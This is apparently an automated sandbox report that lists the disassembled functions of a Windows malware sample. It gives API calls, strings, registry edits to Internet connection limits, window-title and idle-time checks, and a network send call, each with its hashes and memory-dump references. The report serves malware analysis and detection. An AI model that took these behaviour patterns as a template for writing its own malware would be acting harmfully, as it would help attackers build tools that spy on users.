Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FolderFreePathVirtuallstrcat
String ID: ;$\Microsoft Vision\
API String ID: 1529938272-253167065
Opcode ID: 0117663b7d482513ec5c128e3ed695c938a959de82a15ccd780f5db44f91dd9d
Instruction ID: 57750bb430e95cb8b3a801a0a79a79d90cb73f300e64d728013e548e85c71b89
Opcode Fuzzy Hash: 0117663b7d482513ec5c128e3ed695c938a959de82a15ccd780f5db44f91dd9d
Instruction Fuzzy Hash: DB1130B1D40119AACB10EBA1DD49DDEBBB8EF59304F0041AAF505B2181EB38AB55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00417768 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00417798
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004177AA

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

;, xrefs: 004177C2
\Microsoft Vision\, xrefs: 0041779E

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: FolderFreePathVirtuallstrcat
String ID: ;$\Microsoft Vision\
API String ID: 1529938272-253167065
Opcode ID: 2286c9888788fc0e2ad16a614227ad6be7efd3b228f525e611508d68c856d82e
Instruction ID: 6f78473c6e2cb34c5a85cbc83a789d35859da8561740c602fcc05a32008a235b
Opcode Fuzzy Hash: 2286c9888788fc0e2ad16a614227ad6be7efd3b228f525e611508d68c856d82e
Instruction Fuzzy Hash: 20011BB1D40119BACB10EBA1DD49DEFBBB8EF59304F10416AB905B2181EB38AB45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004057CF Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetLastInputInfo.USER32(?), ref: 004057E4
GetTickCount.KERNEL32 ref: 004057EA
GetForegroundWindow.USER32 ref: 004057FE
GetWindowTextW.USER32(00000000,?,00000100), ref: 00405811

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
String ID:
API String ID: 2567647128-0
Opcode ID: 7cb14784cb3cf06ddf416f8ab85a0da2af13f543bbca2a14cb56ceb59dcfd6e4
Instruction ID: bccef276f59dde2628368323e19822f7eea95eeafa3d6c0d82a6d2b4d7897960
Opcode Fuzzy Hash: 7cb14784cb3cf06ddf416f8ab85a0da2af13f543bbca2a14cb56ceb59dcfd6e4
Instruction Fuzzy Hash: 7F113C71D00208ABCB04EBA5D959AEDB7B8AF98304F004569E506B31D0EB786E44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00413893 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138A5
OpenProcessToken.ADVAPI32(00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138AC
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138CA
FindCloseChangeNotification.KERNEL32(00000000,?,75A901C0), ref: 004138DF

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
String ID:
API String ID: 2406157124-0
Opcode ID: 4a1fc8073c6126fd684b9d41b76b5c7fe082ee5359228eafba3cb3cf7665c512
Instruction ID: 6e51b4730b2a25e19fe7bbbf4879b3d54e580121ce136e73de5f441a0657d3a7
Opcode Fuzzy Hash: 4a1fc8073c6126fd684b9d41b76b5c7fe082ee5359228eafba3cb3cf7665c512
Instruction Fuzzy Hash: 85F0E771E00219FBDB11AFA0DC09BDEBBB8EF08751F118175E901A6190E7709F44EA94

Uniqueness

Uniqueness Score: -1.00%

Function 00406DA4 Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00406DAB
GetStartupInfoA.KERNEL32(?), ref: 00406DB9
GetModuleHandleA.KERNEL32(00000000), ref: 00406DD5

Part of subcall function 004174CD: GetTickCount.KERNEL32 ref: 004174FB
Part of subcall function 004174CD: GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417517
Part of subcall function 004174CD: EntryPoint.DBKYOVYK(00000020,0000215A,?), ref: 00417556
Part of subcall function 004174CD: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417574
Part of subcall function 004174CD: GetLastError.KERNEL32 ref: 0041757F
Part of subcall function 004174CD: RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004175B9
Part of subcall function 004174CD: RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 004175D8
Part of subcall function 004174CD: RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 004175ED
Part of subcall function 004174CD: RegCloseKey.ADVAPI32(?), ref: 004175F3

ExitProcess.KERNEL32 ref: 00406DEA

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateModuleValue$CloseCommandCountEntryErrorEventExitFileHandleInfoLastLineNamePointProcessStartupTick
String ID:
API String ID: 3849140870-0
Opcode ID: 57442914445e25e2ef76dc1502f57e629a31bc4cdda9eeba87c4923b3a060936
Instruction ID: 0463fce02a2050416a57427896fb3f25c604de64256d2c2234fc454861e3da61
Opcode Fuzzy Hash: 57442914445e25e2ef76dc1502f57e629a31bc4cdda9eeba87c4923b3a060936
Instruction Fuzzy Hash: 36E01A34910218ABD7007BB2DC1EBDE3A68AF04306F008939F906A6191DB7C59618BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040661E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00417DC1,P_@,?,00000000), ref: 00406681

Strings

nevergonnagiveyouup, xrefs: 00406633
P_@, xrefs: 0040666B, 0040667B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: send
String ID: P_@$nevergonnagiveyouup
API String ID: 2809346765-1642660777
Opcode ID: a0109037047b198be269eb89e9ed772065e8d8fc4e59ea8a9d8bbdef38bf6b3a
Instruction ID: c93521240c80c36f5483e1b7ba56e7e5fb698aa15d608057b6665dac70029988
Opcode Fuzzy Hash: a0109037047b198be269eb89e9ed772065e8d8fc4e59ea8a9d8bbdef38bf6b3a
Instruction Fuzzy Hash: 5201B9B1A101047BCB04BBA5DC52CDFB738DF50364B50463EF722721D1EB796E168A69

Uniqueness

Uniqueness Score: -1.00%

Function 00414D78 Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,00000000,?,?,?,?,0041543B,?,?,00000000), ref: 00414D9B
EntryPoint.DBKYOVYK(00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 00414DA8

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000), ref: 00414DBF

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateEntryFreePoint
String ID:
API String ID: 787861446-0
Opcode ID: 3404045a633e84b070cf4ba7cb029c6df5c873fe43fe648b053df741735b15e6
Instruction ID: d7ada9d40c97bbcdff1f8b913a6c0f5e036cbdbf2cdcd03dacdc312fec564181
Opcode Fuzzy Hash: 3404045a633e84b070cf4ba7cb029c6df5c873fe43fe648b053df741735b15e6
Instruction Fuzzy Hash: 4B018C76610018BFDF159B91DD45EEF7BBCEF48394B10407AF501E2210E634AF40DA68

Uniqueness

Uniqueness Score: -1.00%

Function 004044C4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(0000000A,?,75A901C0,?,?,?,?,?,?,?,?,?,?,00414F10,?,75A901C0), ref: 004044DB

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJK..., xrefs: 004044F1

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$AllocateEntryPointProcess
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...
API String ID: 2682098145-3308977172
Opcode ID: 1c3fe1ff6097f6b7f9f297d6cab661c4fe45f8d4214a7f00c8e4dbc54c282ce1
Instruction ID: 65ca7379f83ee730589fa7b5b08082e74f365495e941c2b8c6af0a312af18c64
Opcode Fuzzy Hash: 1c3fe1ff6097f6b7f9f297d6cab661c4fe45f8d4214a7f00c8e4dbc54c282ce1
Instruction Fuzzy Hash: F301FC76A012547BDB01AA6D9C41BDE77AD9B89754F1000BBF640BB2C2D6756D4082B8

Uniqueness

Uniqueness Score: -1.00%

Function 004136A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 004136B6

Strings

@, xrefs: 004136AE

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 29a571deab1c1d855b1ba77aefd389a9698da1ab67c9d0b2bbd05500b8b1239b
Instruction ID: 3f49ccd38cf2641116e2cec86d2b2d769da988a4b3b50b6997429d95311fa13b
Opcode Fuzzy Hash: 29a571deab1c1d855b1ba77aefd389a9698da1ab67c9d0b2bbd05500b8b1239b
Instruction Fuzzy Hash: 48D0C9B4D0030CABDB00DBA4D859B9DB7BCAB04304F000024EA02A3380D778EC058A55

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA8 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 162sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,?,75A901C0,00000000), ref: 00406ABE

Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404358
Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404365
Part of subcall function 0040434F: lstrcpyA.KERNEL32(00000000,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404378

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00415DC4: EntryPoint.DBKYOVYK(75A901C2,?,75A901C0,?,?,?,00406B41,75A901C0,?,?,?,?,00000000,.bss,00000000), ref: 00415DDE

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Strings

.bss, xrefs: 00406AE0

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$EntryFreePointSleepVirtual
String ID: .bss
API String ID: 3963585526-3890483948
Opcode ID: 43cbfae828139888eb6679a96bbb08f9138cd8fc21e447c83cd85bccde663172
Instruction ID: b1e3754f4be9b583bd94dc7d5809ec66cbd4219b5ade534b9f03eed64d816455
Opcode Fuzzy Hash: 43cbfae828139888eb6679a96bbb08f9138cd8fc21e447c83cd85bccde663172
Instruction Fuzzy Hash: 04616171900109EFCB14EFA1D9D18EEB775AF84308B1041BEE916AB686DF34AB45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040456D Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 004045F0: lstrlenW.KERNEL32(75A901C0,0040466F,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 004045F7

WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00405EA3,?,?,?), ref: 00404595

Part of subcall function 00406F2C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0040467B,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 00406F36

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 004045C0

Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404358
Part of subcall function 0040434F: lstrlenA.KERNEL32(75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404365
Part of subcall function 0040434F: lstrcpyA.KERNEL32(00000000,75A901C0,?,00406AED,.bss,00000000,?,75A901C0,00000000), ref: 00404378

Part of subcall function 0040415D: lstrcatA.KERNEL32(00000000,75A901C0,?,00000000,?,004045D8,00000000,00000000,?,00405EA3,?,?,?,?,?), ref: 00404189

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
String ID:
API String ID: 346377423-0
Opcode ID: fb0124e93dcc4b30db1f6feb5653de740ff45c62ea3699da9c1c316d436a3617
Instruction ID: 20ff4fbb62e3618bfb485c2261b0b78fe39657fc0922845be0123cbb39c17a56
Opcode Fuzzy Hash: fb0124e93dcc4b30db1f6feb5653de740ff45c62ea3699da9c1c316d436a3617
Instruction Fuzzy Hash: 280196B1600114BFDB04AFA6DC9ACDF7B6CDF4A344700003AB605AB281DA745E00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041473A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49stringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32(?,E[A,?,74DF0F00,00415B45), ref: 00414773

Strings

E[A, xrefs: 0041476D

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID: E[A
API String ID: 1534048567-3515114400
Opcode ID: 358950ad2ba101315369c726cb274826dad6cc85241393e3af5ca988d8b71ec6
Instruction ID: 40985432b3a9e382e5b6e600848d6d08da5288a058ea9024677ac253dd4eaa12
Opcode Fuzzy Hash: 358950ad2ba101315369c726cb274826dad6cc85241393e3af5ca988d8b71ec6
Instruction Fuzzy Hash: 65019632A00115BFC710DFA9C881EAAB7F8FF86314B00007AE405C3601E734ED95CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 00413960 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 0041396D

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,?,00417610,?,0041538F,?,75A901C0,00000000,?,?,?,?,00417610), ref: 00413981

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcesslstrcpylstrlen$AllocateEntryFileModuleNamePointVirtual
String ID:
API String ID: 1476767053-0
Opcode ID: 1ac0641acfd5a32de24d788371bf98d9f18113f9ccb0100c4f200855fd859e53
Instruction ID: 5518ed19fed20e7e1335476bb0e29cad1db85070db4d5b34d9ce0ae4d115fd75
Opcode Fuzzy Hash: 1ac0641acfd5a32de24d788371bf98d9f18113f9ccb0100c4f200855fd859e53
Instruction Fuzzy Hash: C7E06D626042506BD2147B56DC06F9F7AADDFD13AAF01003EF606A61D1DFBC5A40CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415C58 Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 00415C5D
GetTickCount.KERNEL32 ref: 00415C63

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CountSleepTick
String ID:
API String ID: 2804873075-0
Opcode ID: b38d5cf20f41c202f6e661d697d71df141f1ca9729bacf98cd1d1f9bd0ee6575
Instruction ID: 6f23aee804a61075c97f0e66c59e0c8c89f3ed7f00de2603d4f996aeb81a77b5
Opcode Fuzzy Hash: b38d5cf20f41c202f6e661d697d71df141f1ca9729bacf98cd1d1f9bd0ee6575
Instruction Fuzzy Hash: F1D0A9302881045BE30C9A19FC2A3A13A6EE7C8301F00C03AF20EC90E0C9B058608448

Uniqueness

Uniqueness Score: -1.00%

Function 0041405B Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?,?,00413C26,00417602,00406CA0,00417602,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00414060
FindCloseChangeNotification.KERNEL32(?,?,75A901C0,00000000), ref: 00414068

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindMutexNotificationRelease
String ID:
API String ID: 4264517613-0
Opcode ID: edd6ace316d2912b51fd3cebaebcb0f31cf6a107f61f8be850721f57fcaf47e5
Instruction ID: c4b3b63f2e0466c523ad9620aad9bfa055e219a5d9f7e3bf95353f89d241b105
Opcode Fuzzy Hash: edd6ace316d2912b51fd3cebaebcb0f31cf6a107f61f8be850721f57fcaf47e5
Instruction Fuzzy Hash: A4B04836800022EFFB212F14F81C8D4BAA5EB0A251316856AF08181038CAA20C90EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00406F8D Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,-00000004,004024B3,75A901C0,?,75A901C0,00402C48,00000000,75A901C0,?,00000000,?,00414201,75A901C0,?), ref: 00406F94
RtlFreeHeap.NTDLL(00000000,?,00414201,75A901C0,?), ref: 00406F9B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 338a7febe50ce7f307bebc65c50e088b4b280f25ee8b23147bef4bd0a9c33757
Instruction ID: 14c9a69ff2ecdcb3aabd5dc369ffcf68902cd261c48436b2349318262a802aaa
Opcode Fuzzy Hash: 338a7febe50ce7f307bebc65c50e088b4b280f25ee8b23147bef4bd0a9c33757
Instruction Fuzzy Hash: F5B092B4615101AEEE0857A1AD2DBAA39189B08702F024028F60E95190CA6948108629

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: edbad8b667ba7ca3cfd6797d8ad6f6e49adaa6159a0ec472dbaaf9cc73205d80
Instruction ID: 7b659ae9f8d441d0393044a73bcaa537b91bef56160f5381ec1ca158e3bbf404
Opcode Fuzzy Hash: edbad8b667ba7ca3cfd6797d8ad6f6e49adaa6159a0ec472dbaaf9cc73205d80
Instruction Fuzzy Hash: E0B01271504200EBDF001BF09E1CBC93E24AB4CB02F008418F30D80060C6304800DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00401014 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
